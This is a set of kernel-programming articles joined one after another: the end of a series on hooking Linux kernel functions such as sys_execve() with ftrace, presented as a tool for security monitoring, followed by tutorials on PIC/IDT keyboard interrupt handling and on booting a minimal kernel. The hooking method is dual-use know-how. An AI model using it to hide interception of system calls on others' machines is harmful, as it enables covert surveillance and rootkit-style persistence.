  10. The callback does nothing. The sys_execve() function was called not by the kernel from do_syscall_64() but by our fh_sys_execve() function. Therefore, the registers remain unchanged and the sys_execve() function is executed as usual. The only problem is that ftrace sees the entry to sys_execve() twice.
  11. The wrapper gets back control. The system call handler sys_execve() gives control to our fh_sys_execve() function for the second time. Now, the launch of a new process is nearly finished. We can see if the execve() call finished with an error, study the new process, make some notes to the log file, and so on.
  12. The kernel receives control. Finally, the fh_sys_execve() function is finished and control returns to the do_syscall_64() function. The function sees the call as one that was completed normally, and the kernel proceeds as usual.
  13. Control goes to the user process. In the end, the kernel executes the IRET instruction (or SYSRET, but for execve() there can be only IRET), installing the registers for a new user process and switching the processor into user code execution mode. The system call is over and so is the launch of the new process.
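The control flow in the steps above can be mimicked with ordinary function calls. The sketch below is a user-space model, not kernel code: an explicit `enum caller` argument stands in for the parent_ip check, and all function names are hypothetical. It makes two properties from the list visible: the wrapper and the original body each run once, while the tracer entry is passed twice.

```c
#include <assert.h>

static int tracer_entries;    /* how often the "ftrace" entry point ran */
static int wrapper_calls;     /* how often the wrapper ran */
static int original_calls;    /* how often the original body ran */

/* Stands in for the parent_ip test: who called the hooked function? */
enum caller { CALLER_KERNEL, CALLER_WRAPPER };

/* Plays the role of the real sys_execve() body. */
static long original_execve(void)
{
    original_calls++;
    return 0;
}

static long traced_execve(enum caller from);

/* Plays the role of fh_sys_execve(): code before, original call, code after. */
static long wrapper_execve(void)
{
    long ret;

    wrapper_calls++;
    ret = traced_execve(CALLER_WRAPPER);   /* steps 8 to 11 */
    return ret;
}

/*
 * Plays the role of the hooked function's entry: the tracer runs first and
 * either redirects to the wrapper or lets the original body execute.
 */
static long traced_execve(enum caller from)
{
    assert(from == CALLER_KERNEL || from == CALLER_WRAPPER);
    tracer_entries++;                      /* steps 3, 4 and 9 */
    if (from == CALLER_KERNEL)
        return wrapper_execve();           /* steps 5 to 7 */
    return original_execve();              /* step 10 */
}

/* Plays the role of do_syscall_64() dispatching the system call. */
static long dispatch_execve(void)
{
    return traced_execve(CALLER_KERNEL);
}
```

After one call to `dispatch_execve()`, the tracer counter is twice the wrapper counter, which is the double entry mentioned in step 10.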

As you can see, the process of hooking Linux kernel function calls with ftrace isn’t that complex.


Even though the main purpose of ftrace is to trace Linux kernel function calls rather than hook them, our innovative approach turned out to be both simple and effective. However, the approach we describe above works only for kernel versions 3.19 and higher and only for the x86_64 architecture.

In the final part of our series, we’ll tell you about the main ftrace pros and cons and some unexpected surprises that might be waiting for you if you decide to implement this approach. Meanwhile, you can read about another unusual solution for installing hooks — by using the GCC attribute constructor with LD_PRELOAD.

Ftrace is a Linux utility that’s usually used for tracing kernel functions. But as we looked for a useful solution that would allow us to enable system activity monitoring and block suspicious processes, we discovered that Linux ftrace can also be used for hooking function calls.

Pros and cons of using ftrace

Ftrace makes hooking Linux kernel functions much easier and has several crucial advantages.

  • A mature API and simple code. Leveraging ready-to-use interfaces in the kernel significantly reduces code complexity. You can hook your kernel functions with ftrace by making only a couple of function calls, filling in two structure fields, and adding a bit of magic in the callback. The rest of the code is just business logic executed around the traced function.
  • Ability to trace any function by name. Linux kernel tracing with ftrace is quite a simple process – writing the function name in a regular string is enough to point to the one you need. You don’t need to struggle with the linker, scan the memory, or investigate internal kernel data structures. As long as you know their names, you can trace your kernel functions with ftrace even if those functions aren’t exported for the modules.

But just like the other approaches that we’ve described in this series, ftrace has a couple of drawbacks.

Kernel configuration requirements. There are several kernel requirements needed to ensure successful ftrace Linux kernel tracing:

  • The list of kallsyms symbols for searching functions by name
  • The ftrace framework as a whole for performing tracing
  • Ftrace options crucial for hooking functions

All these features can be disabled in the kernel configuration since they aren’t critical for the system’s functioning. Usually, however, the kernels used by popular distributions still contain all these kernel options as they don’t affect system performance significantly and may be useful for debugging. Still, you’d better keep these requirements in mind in case you need to support some particular kernels.

Overhead costs. Since ftrace doesn’t use breakpoints, it has lower overhead costs than kprobes. However, the overhead costs are higher than for splicing manually. In fact, dynamic ftrace is a variation of splicing which executes the unneeded ftrace code and other callbacks.

Functions are wrapped as a whole. Just as with usual splicing, ftrace wraps the functions as a whole. And while splicing technically can be executed in any part of the function, ftrace works only at the entry point. You can see this limitation as a disadvantage, but usually it doesn’t cause any complications.

Double ftrace calls. As we’ve explained before, using the parent_ip pointer for analysis leads to calling ftrace twice for the same hooked function. This adds some overhead costs and can disrupt the readings of other traces because they’ll see twice as many calls. This issue can be fixed by moving the original function address five bytes further (the length of the call instruction) so you can basically jump over the ftrace call.
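The five-byte adjustment mentioned for double ftrace calls is plain address arithmetic. In the sketch below, `FENTRY_CALL_SIZE` and `entry_past_ftrace` are hypothetical names; on x86 the kernel has its own constant for this length (MCOUNT_INSN_SIZE), and the value 5 is specific to that architecture.

```c
#include <assert.h>
#include <stdint.h>

#define FENTRY_CALL_SIZE 5   /* bytes taken by the ftrace call at function entry */

/* Address to call if the wrapper wants to bypass the ftrace call entirely. */
static uintptr_t entry_past_ftrace(uintptr_t function_address)
{
    assert(function_address <= UINTPTR_MAX - FENTRY_CALL_SIZE);
    return function_address + FENTRY_CALL_SIZE;
}
```

If the wrapper calls the original through such an adjusted pointer, the callback is never entered a second time, so the parent_ip test is no longer what prevents the recursion.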

Let’s take a closer look at some of these disadvantages.

Kernel configuration requirements

The kernel has to support both ftrace and kallsyms. This requires enabling two configuration options:

  • CONFIG_FTRACE
  • CONFIG_KALLSYMS


Next, ftrace has to support a dynamic register modification, which is the responsibility of the following option:

  • CONFIG_DYNAMIC_FTRACE_WITH_REGS


To access the FTRACE_OPS_FL_IPMODIFY flag, the kernel you use has to be based on version 3.19 or higher. Older kernel versions can still modify the register %rip, but from version 3.19, this register can be modified only after setting the flag. In older versions of the kernel, the presence of this flag will lead to a compilation error. For newer versions, the absence of this flag means a non-operating hook.
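One way to cope with both situations is to choose the flags based on the kernel version. In a real module this would be a compile-time `#if` on LINUX_VERSION_CODE; the sketch below models the same decision as a run-time function so it can be tried in user space. `KVER`, `hook_flags_for` and the `SKETCH_FL_*` values are hypothetical placeholders, not the kernel's real flag bits.

```c
#include <assert.h>

/* Same encoding as the kernel's classic KERNEL_VERSION() macro. */
#define KVER(major, minor, patch) \
    (((unsigned int)(major) << 16) + ((unsigned int)(minor) << 8) + \
     (unsigned int)(patch))

/* Placeholder flag bits: illustrative values, not the kernel's real ones. */
#define SKETCH_FL_SAVE_REGS 0x1u
#define SKETCH_FL_IPMODIFY  0x2u

/* Pick the ops flags a hook would need on a given kernel version. */
static unsigned int hook_flags_for(unsigned int kernel_version)
{
    unsigned int flags = SKETCH_FL_SAVE_REGS;

    assert(kernel_version != 0);
    /* From 3.19 on, changing the instruction pointer needs IPMODIFY. */
    if (kernel_version >= KVER(3, 19, 0))
        flags |= SKETCH_FL_IPMODIFY;
    return flags;
}
```

Doing the check at compile time matters in practice, because on older kernels the flag's name does not exist and merely mentioning it breaks the build.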

Last but not least, we need to pay attention to the ftrace call location inside the function. The ftrace call must be located at the beginning of the function, before the function prologue (where the stack frame is formed and the space for local variables is allocated). The following option takes this feature into account:

  • CONFIG_HAVE_FENTRY


While the x86_64 architecture does support this option, the i386 architecture doesn’t. The compiler can’t insert an ftrace call before the function prologue due to ABI limitations of the i386 architecture. As a result, by the time you perform an ftrace call the function stack has already been modified, and changing the value of the register isn’t enough for hooking the function. You’ll also need to undo the actions executed in the prologue, which differ from function to function.

This is why ftrace function hooking doesn’t support the 32-bit x86 architecture. In theory, you can still implement this approach by generating and executing an anti-prologue, for instance, but that would significantly increase the technical complexity.

Unexpected surprises when using ftrace

At the testing stage, we faced one particular peculiarity: hooking functions on some distributions led to the permanent hanging of the system. Of course, this problem occurred only on systems that were different from those used by our developers. We also couldn’t reproduce the problem with the initial hooking prototype on any distributions or kernel versions.

Debugging showed that the system got stuck inside the hooked function. For some unknown reason, parent_ip still pointed to the kernel instead of the function wrapper when the original function was called inside the ftrace callback. This launched an endless loop in which ftrace called our wrapper again and again while doing nothing useful.

Fortunately, we had both working and broken code and eventually discovered what was causing the problem. When we unified the code and got rid of the pieces we didn’t need at the moment, we narrowed down the differences between the two versions of the wrapper function code.

This is the stable code:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_debug("execve() returns: %ld\n", ret);
        return ret;
}

And this is the code that caused the system to hang:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;
        pr_devel("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);
        ret = real_sys_execve(filename, argv, envp);
        pr_devel("execve() returns: %ld\n", ret);
        return ret;
}

How can the logging level possibly affect system behavior? Surprisingly enough, when we took a closer look at the machine code of these two functions, it became obvious that the reason behind these problems was the compiler.

It turns out that the pr_devel() calls expand to a no-op. This version of the printk macro is used for logging at the development stage. Since these logs are of no interest in production, they are cut out of the code automatically unless you define the DEBUG macro. After that, the compiler sees the function like this:

static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        return real_sys_execve(filename, argv, envp);
}

And this is where optimizations take the stage. In our case, the so-called tail call optimization was activated. If a function calls another and returns its value immediately, this optimization lets the compiler replace the function call instruction with a cheaper direct jump to the function’s body. This is what the call looks like in the machine code of the stable version:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   ff 15 00 00 00 00       callq  *0x0(%rip)
   b:   f3 c3                   repz retq

And this is an example of the broken call:

0000000000000000 <fh_sys_execve>:
   0:   e8 00 00 00 00          callq  5 <fh_sys_execve+0x5>
   5:   48 8b 05 00 00 00 00    mov    0x0(%rip),%rax
   c:   ff e0                   jmpq   *%rax

The first CALL instruction is the same __fentry__() call that the compiler inserts at the beginning of every function. After that, the broken and the stable code act differently. In the stable code, we can see the real_sys_execve() call (via a pointer stored in memory) performed by the CALL instruction, followed by the return from fh_sys_execve() performed by the RET instruction. In the broken code, however, there’s a direct jump to the real_sys_execve() function performed by JMP.

The tail call optimization allows you to save some time by not allocating a useless stack frame that includes the return address that the CALL instruction stores in the stack. But since we’re using parent_ip to decide whether we need to hook, the accuracy of the return address is crucial for us. After optimization, the fh_sys_execve() function doesn’t save the new address on the stack anymore, so there’s only the old one leading to the kernel. And this is why the parent_ip keeps pointing inside the kernel and that endless loop appears in the first place.

This is also the main reason why the problem appeared only on some distributions. Different distributions use different sets of compilation flags for compiling the modules. And in all the problem distributions, the tail call optimization was active by default.

We managed to solve this problem by turning off tail call optimization for the entire file with the wrapper functions:

  • #pragma GCC optimize("-fno-optimize-sibling-calls")
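As a rough user-space illustration of where the pragma goes, the sketch below puts it ahead of a wrapper that returns the result of a call made through a function pointer, which is the same shape as fh_sys_execve(). The names demo_real(), demo_real_ptr and demo_wrapper() are hypothetical and exist only for this example. The pragma is GCC-specific, so other compilers may ignore it.

```c
#include <assert.h>

/* Same pragma as above: for the functions that follow in this file, */
/* GCC is asked not to turn "return f(x);" into a jump.              */
#pragma GCC optimize("-fno-optimize-sibling-calls")

/* Hypothetical stand-ins for the original function and its pointer. */
static long demo_real(long x)
{
	return x * 2;
}

static long (*demo_real_ptr)(long) = demo_real;

/* Hypothetical wrapper with a call in tail position. */
static long demo_wrapper(long x)
{
	assert(demo_real_ptr != 0);
	return demo_real_ptr(x);
}
```

Whether the call really stays a CALL followed by RET can be checked by disassembling the object file, for example with objdump -d, and comparing it with the listings above.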

For further hooking experiments, you can use the full kernel module code from GitHub.


While developers typically use ftrace to trace Linux kernel function calls, this utility showed itself to be rather useful for hooking Linux kernel functions as well. And even though this approach has some disadvantages, it gives you one crucial benefit: overall simplicity of both the code and the hooking process.

Let’s write a Kernel with keyboard and screen support

origin text

Today, we will extend that kernel to include a keyboard driver that can read the characters a-z and 0-9 from the keyboard and print them on screen.

Source code used for this article is available at Github repository — mkeykernel

We communicate with I/O devices using I/O ports. These ports are just specific addresses on the x86’s I/O bus, nothing more. Read and write operations on these ports are performed with specific instructions built into the processor.


Reading from and Writing to ports

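read_port:
	mov edx, [esp + 4]	;port number (first argument)
	in al, dx		;read a byte from the port into al
	ret

write_port:
	mov   edx, [esp + 4]    	;port number (first argument)
	mov   al, [esp + 4 + 4]  	;data byte (second argument)
	out   dx, al  
	ret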

I/O ports are accessed using the in and out instructions that are part of the x86 instruction set.

In read_port, the port number is taken as an argument. When the compiler generates a call to your function, it pushes all the arguments onto the stack. The argument is copied to the register edx using the stack pointer. The register dx is the lower 16 bits of edx. The in instruction here reads the port whose number is given by dx and puts the result in al. Register al is the lower 8 bits of eax. If you remember your college lessons, function return values are passed back through the eax register. Thus read_port lets us read I/O ports.

write_port is very similar. Here we take 2 arguments: port number and the data to be written. The out instruction writes the data to the port.



Now, before we go ahead with writing any device driver, we need to understand how the processor gets to know that the device has performed an event.

The easiest solution is polling: checking the status of the device over and over, forever. For obvious reasons, this is neither efficient nor practical. This is where interrupts come into the picture. An interrupt is a signal sent to the processor by the hardware or software indicating an event. With interrupts, we can avoid polling and act only when the specific interrupt we are interested in is triggered.

A device or a chip called Programmable Interrupt Controller (PIC) is responsible for x86 being an interrupt driven architecture. It manages hardware interrupts and sends them to the appropriate system interrupt.

When certain actions are performed on a hardware device, it sends a pulse called Interrupt Request (IRQ) along its specific interrupt line to the PIC chip. The PIC then translates the received IRQ into a system interrupt, and sends a message to interrupt the CPU from whatever it is doing. It is then the kernel’s job to handle these interrupts.

Without a PIC, we would have to poll all the devices in the system to see if an event has occurred in any of them.

Let’s take the case of a keyboard. The keyboard works through the I/O ports 0x60 and 0x64. Port 0x60 gives the data (pressed key) and port 0x64 gives the status. However, you have to know exactly when to read these ports.

Interrupts come in quite handy here. When a key is pressed, the keyboard gives a signal to the PIC along its interrupt line IRQ1. The PIC has an offset value stored during initialization of the PIC. It adds the input line number to this offset to form the interrupt number. Then the processor looks up a data structure called the Interrupt Descriptor Table (IDT) to find the interrupt handler address corresponding to the interrupt number.

Code at this address is then run, which handles the event.

Setting up the IDT

struct IDT_entry{
	unsigned short int offset_lowerbits;
	unsigned short int selector;
	unsigned char zero;
	unsigned char type_attr;
	unsigned short int offset_higherbits;
};

struct IDT_entry IDT[IDT_SIZE];

void idt_init(void)
{
	unsigned long keyboard_address;
	unsigned long idt_address;
	unsigned long idt_ptr[2];

	/* populate IDT entry of keyboard's interrupt */
	keyboard_address = (unsigned long)keyboard_handler; 
	IDT[0x21].offset_lowerbits = keyboard_address & 0xffff;
	IDT[0x21].selector = 0x08; /* KERNEL_CODE_SEGMENT_OFFSET */
	IDT[0x21].zero = 0;
	IDT[0x21].type_attr = 0x8e; /* INTERRUPT_GATE */
	IDT[0x21].offset_higherbits = (keyboard_address & 0xffff0000) >> 16;

	/*     Ports
	*	 PIC1	PIC2
	*Command 0x20	0xA0
	*Data	 0x21	0xA1
	*/

	/* ICW1 - begin initialization */
	write_port(0x20 , 0x11);
	write_port(0xA0 , 0x11);

	/* ICW2 - remap offset address of IDT */
	/*
	* In x86 protected mode, we have to remap the PICs beyond 0x20 because
	* Intel have designated the first 32 interrupts as "reserved" for cpu exceptions
	*/
	write_port(0x21 , 0x20);
	write_port(0xA1 , 0x28);

	/* ICW3 - setup cascading */
	write_port(0x21 , 0x00);  
	write_port(0xA1 , 0x00);  

	/* ICW4 - environment info */
	write_port(0x21 , 0x01);
	write_port(0xA1 , 0x01);
	/* Initialization finished */

	/* mask interrupts */
	write_port(0x21 , 0xff);
	write_port(0xA1 , 0xff);

	/* fill the IDT descriptor */
	idt_address = (unsigned long)IDT ;
	idt_ptr[0] = (sizeof (struct IDT_entry) * IDT_SIZE) + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16 ;

	/* hand the descriptor to lidt */
	load_idt(idt_ptr);
}


We implement IDT as an array comprising structures IDT_entry. We’ll discuss how the keyboard interrupt is mapped to its handler later in the article. First, let’s see how the PICs work.

Modern x86 systems have 2 PIC chips each having 8 input lines. Let’s call them PIC1 and PIC2. PIC1 receives IRQ0 to IRQ7 and PIC2 receives IRQ8 to IRQ15. PIC1 uses port 0x20 for Command and 0x21 for Data. PIC2 uses port 0xA0 for Command and 0xA1 for Data.

The PICs are initialized using 8-bit command words known as Initialization command words (ICW). See this link for the exact bit-by-bit syntax of these commands.

In protected mode, the first command you will need to give the two PICs is the initialize command ICW1 (0x11). This command makes the PIC wait for 3 more initialization words on the data port.

These commands tell the PICs about:

* Their vector offset. (ICW2)
* How the PICs are wired as master/slave. (ICW3)
* Additional information about the environment. (ICW4)

The second initialization command is the ICW2, written to the data ports of each PIC. It sets the PIC’s offset value. This is the value to which we add the input line number to form the Interrupt number.

PICs allow cascading of their outputs to inputs between each other. This is set up using ICW3, where each bit represents the cascading status for the corresponding IRQ. For now, we won’t use cascading and will set all bits to zero.

ICW4 sets the additional environmental parameters. We will just set the lowermost bit to tell the PICs we are running in 80x86 mode.

Tang ta dang !! PICs are now initialized.


Each PIC has an internal 8-bit register named the Interrupt Mask Register (IMR). This register stores a bitmap of the IRQ lines going into the PIC. When a bit is set, the PIC ignores the request. This means we can enable and disable the nth IRQ line by setting the nth bit in the IMR to 0 and 1 respectively. Reading from the data port returns the value in the IMR, and writing to it sets the register. Here in our code, after initializing the PICs, we set all bits to 1, thereby disabling all IRQ lines. We will later enable the line corresponding to the keyboard interrupt. As of now, let’s disable all the interrupts !!
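The bit arithmetic behind the mask can be sketched in plain C. The helpers imr_enable_line() and imr_disable_line() are hypothetical names introduced for this illustration; they only compute the new mask value and do not touch any hardware port.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: clear bit `line` so that the PIC accepts that IRQ. */
static uint8_t imr_enable_line(uint8_t imr, unsigned int line)
{
	assert(line < 8);
	return (uint8_t)(imr & ~(1u << line));
}

/* Hypothetical helper: set bit `line` so that the PIC ignores that IRQ. */
static uint8_t imr_disable_line(uint8_t imr, unsigned int line)
{
	assert(line < 8);
	return (uint8_t)(imr | (1u << line));
}
```

Starting from 0xFF (everything masked), enabling line 1 gives 0xFD, which is the value kb_init() writes to port 0x21 to turn on the keyboard line.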

Once IRQ lines are enabled, our PICs can receive signals on them and convert each one to an interrupt number by adding the offset. Now, we need to populate the IDT such that the interrupt number for the keyboard is mapped to the address of the keyboard handler function we will write.

Which interrupt number should the keyboard handler address be mapped against in the IDT?

The keyboard uses IRQ1. This is input line 1 of PIC1. We have initialized PIC1 to an offset of 0x20 (see ICW2). To find the interrupt number, add 1 + 0x20, i.e. 0x21. So, the keyboard handler address has to be mapped against interrupt 0x21 in the IDT.
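The same addition, written out as a small C sketch. The function irq_to_vector() and the two macro names are hypothetical; the offsets are the ICW2 values that idt_init() writes to the two PICs.

```c
#include <assert.h>

#define PIC1_OFFSET 0x20	/* ICW2 value written to PIC1 in idt_init() */
#define PIC2_OFFSET 0x28	/* ICW2 value written to PIC2 in idt_init() */

/* Hypothetical helper: map an IRQ line (0-15) to its interrupt number. */
static unsigned int irq_to_vector(unsigned int irq)
{
	assert(irq < 16);
	if (irq < 8)
		return PIC1_OFFSET + irq;	/* input lines of PIC1 */
	return PIC2_OFFSET + (irq - 8);		/* input lines of PIC2 */
}
```

For the keyboard, irq_to_vector(1) evaluates to 0x21, the IDT index used throughout this article.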

So, the next task is to populate the IDT for the interrupt 0x21.
We will map this interrupt to a function keyboard_handler which we will write in our assembly file.

Each IDT entry consists of 64 bits. In the IDT entry for the interrupt, we do not store the address of the handler function in one piece. We split it into 2 parts of 16 bits. The lower 16 bits are stored in the first 16 bits of the IDT entry and the higher 16 bits are stored in the last 16 bits of the IDT entry. This is done to maintain compatibility with the 286. You can see Intel pulls shrewd kludges like these in so many places !!

In the IDT entry, we also have to set the type, which marks this entry as an interrupt gate. We also need to give the kernel code segment offset. The GRUB bootloader sets up a GDT for us. Each GDT entry is 8 bytes long, and the kernel code descriptor is the second segment, so its offset is 0x08 (more on this would be too much for this article). An interrupt gate is represented by 0x8e. The remaining 8 bits in the middle have to be filled with zeroes. In this way, we have filled the IDT entry corresponding to the keyboard’s interrupt.
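To make the split concrete, here is a minimal sketch that builds one entry from a 32-bit handler address. The struct mirrors IDT_entry but uses fixed-width types so that it behaves the same on a 64-bit host; idt_entry_sketch and make_interrupt_gate() are hypothetical names used only here.

```c
#include <assert.h>
#include <stdint.h>

/* Same field layout as IDT_entry, with fixed-width types. */
struct idt_entry_sketch {
	uint16_t offset_lowerbits;
	uint16_t selector;
	uint8_t  zero;
	uint8_t  type_attr;
	uint16_t offset_higherbits;
};

/* Hypothetical helper: fill an interrupt-gate entry for a handler address. */
static struct idt_entry_sketch make_interrupt_gate(uint32_t handler)
{
	struct idt_entry_sketch e;

	e.offset_lowerbits  = (uint16_t)(handler & 0xffff);
	e.selector          = 0x08;	/* kernel code segment offset */
	e.zero              = 0;
	e.type_attr         = 0x8e;	/* interrupt gate */
	e.offset_higherbits = (uint16_t)(handler >> 16);
	assert(sizeof(e) == 8);		/* one entry is 64 bits */
	return e;
}
```

For a handler at the made-up address 0x00101234, the lower half stored in the entry is 0x1234 and the upper half is 0x0010.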

Once the required mappings are done in the IDT, we have to tell the CPU where the IDT is located.
This is done via the lidt assembly instruction. lidt takes one operand. The operand must be a pointer to a descriptor structure that describes the IDT.

The descriptor is quite straightforward. It contains the size of the IDT in bytes and its address. I have used an array to pack the values. You may also populate it using a struct.
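A possible struct form is sketched below, together with a check that it produces the same six bytes as the array packing used in idt_init(). Several assumptions apply: idt_descriptor_sketch and descriptor_forms_match() are hypothetical names, the packed attribute is a GCC/Clang extension, the comparison relies on a little-endian host, and uint32_t replaces unsigned long so that the arithmetic matches a 32-bit kernel. Strictly speaking, the first field is a limit (the offset of the last valid byte, that is, size minus one); the sketch stores the size itself, as the article’s code does.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical struct form of the 6-byte descriptor read by lidt. */
struct idt_descriptor_sketch {
	uint16_t size;	/* size of the IDT in bytes, as stored by idt_init() */
	uint32_t base;	/* address of the IDT */
} __attribute__((packed));

/* Returns 1 if the struct and the array packing give the same 6 bytes. */
static int descriptor_forms_match(uint32_t idt_address, uint16_t idt_bytes)
{
	struct idt_descriptor_sketch d = { idt_bytes, idt_address };
	uint32_t idt_ptr[2];

	/* the array packing from idt_init() */
	idt_ptr[0] = idt_bytes + ((idt_address & 0xffff) << 16);
	idt_ptr[1] = idt_address >> 16;

	assert(sizeof(d) == 6);
	return memcmp(&d, idt_ptr, sizeof(d)) == 0;
}
```

The struct version makes the two fields explicit, at the cost of depending on a compiler-specific attribute to avoid padding between them.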

We have the pointer in the variable idt_ptr and then pass it on to lidt using the function load_idt().

load_idt:
	mov edx, [esp + 4]
	lidt [edx]
	sti 				;turn on interrupts
	ret

Additionally, the load_idt() function turns interrupts on using the sti instruction.

Once the IDT is set up and loaded, we can turn on keyboard’s IRQ line using the interrupt mask we discussed earlier.

void kb_init(void)
{
	/* 0xFD is 11111101 - enables only IRQ1 (keyboard)*/
	write_port(0x21 , 0xFD);
}


Keyboard interrupt handling function

Well, now we have successfully mapped keyboard interrupts to the function keyboard_handler via the IDT entry for interrupt 0x21.
So, every time you press a key on your keyboard you can be sure this function is called.

keyboard_handler:
	call    keyboard_handler_main
	iretd

This function just calls another function written in C and returns using the iret class of instructions. We could have written our entire interrupt handling process here, but it’s much easier to write code in C than in assembly, so we take it there.
iret/iretd should be used instead of ret when returning control from an interrupt handler to the program that was interrupted. This class of instructions pops the flags register that was pushed onto the stack when the interrupt call was made.

void keyboard_handler_main(void) {
	unsigned char status;
	char keycode;

	/* write EOI */
	write_port(0x20, 0x20);

	status = read_port(KEYBOARD_STATUS_PORT);
	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		/* negative keycodes (top bit set) are ignored */
		if(keycode < 0)
			return;
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	
	}
}

We first signal EOI (End Of Interrupt acknowledgment) by writing it to the PIC’s command port. Only after this will the PIC allow further interrupt requests. We have to read 2 ports here: the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, it means the buffer is empty and there is no data to read. In other cases, we can read the data port 0x60. This port will give us a keycode of the key pressed. Each keycode corresponds to each key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed on to the screen using the same technique we used in the previous article.

For the sake of brevity, this article handles only lowercase a-z and digits 0-9. You can easily extend this to include special characters, ALT, SHIFT and CAPS LOCK. You can tell whether a key was pressed or released from the keycode read from the data port (a release has the top bit set, which is why the handler skips negative values) and perform the desired action. You can also map any combination of keys to special functions such as shutdown.
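As a starting point for such extensions, the sketch below separates key releases from key presses before looking up a character. It assumes the keycodes arrive as scancode set 1, the same assumption keyboard_map.h makes. demo_map_lookup() covers just three keys and is only a stand-in for the real table, and decode_scancode() is a hypothetical name.

```c
#include <assert.h>

/* Tiny, partial lookup for three keys; the real table is in keyboard_map.h. */
static char demo_map_lookup(unsigned char make_code)
{
	switch (make_code) {
	case 0x02: return '1';
	case 0x10: return 'q';
	case 0x1E: return 'a';
	default:   return 0;	/* key not covered by this sketch */
	}
}

/* Hypothetical decoder: character for a key press, 0 for anything else. */
static char decode_scancode(unsigned char scancode)
{
	if (scancode & 0x80)	/* top bit set: the key was released */
		return 0;
	assert(scancode < 0x80);
	return demo_map_lookup(scancode);
}
```

Tracking SHIFT or CAPS LOCK would mean remembering the press and release of those keys in a state variable and choosing a different table while they are active.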

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support





Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address for the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is in fact, the last 16 bytes of the 32-bit address space. This memory address is called reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution. The BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine whether the device is bootable: bytes 511 and 512 of the first sector must hold 0xAA55.
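The signature check can be sketched in a few lines of C. is_bootable_sector() is a hypothetical helper that works on a 512-byte buffer already read from the device. Since 0xAA55 is stored as a little-endian word, the byte 0x55 comes first (offset 510, counting from zero) and 0xAA second (offset 511).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SECTOR_SIZE 512

/* Hypothetical helper: does this first sector end with the boot signature? */
static int is_bootable_sector(const uint8_t *sector)
{
	assert(sector != NULL);
	/* 0xAA55 little-endian: 0x55 at offset 510, 0xAA at offset 511 */
	return sector[SECTOR_SIZE - 2] == 0x55 &&
	       sector[SECTOR_SIZE - 1] == 0xAA;
}
```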

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in the case of the Linux kernel, GRUB detects the Linux boot protocol and loads the Linux kernel in real mode. The Linux kernel itself makes the switch to protected mode.


What all do we need?

* An x86 computer (of course)
* Linux
* NASM assembler
* gcc
* ld (GNU Linker)
* grub


Source Code

Source code is available at my Github repository — mkernel


The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first line, bits 32, is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32-bit mode. It is not strictly required in our example, but it is included here because it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is defined elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can wake the CPU from an hlt instruction. So we disable interrupts beforehand using the cli instruction. cli is short for clear-interrupts.

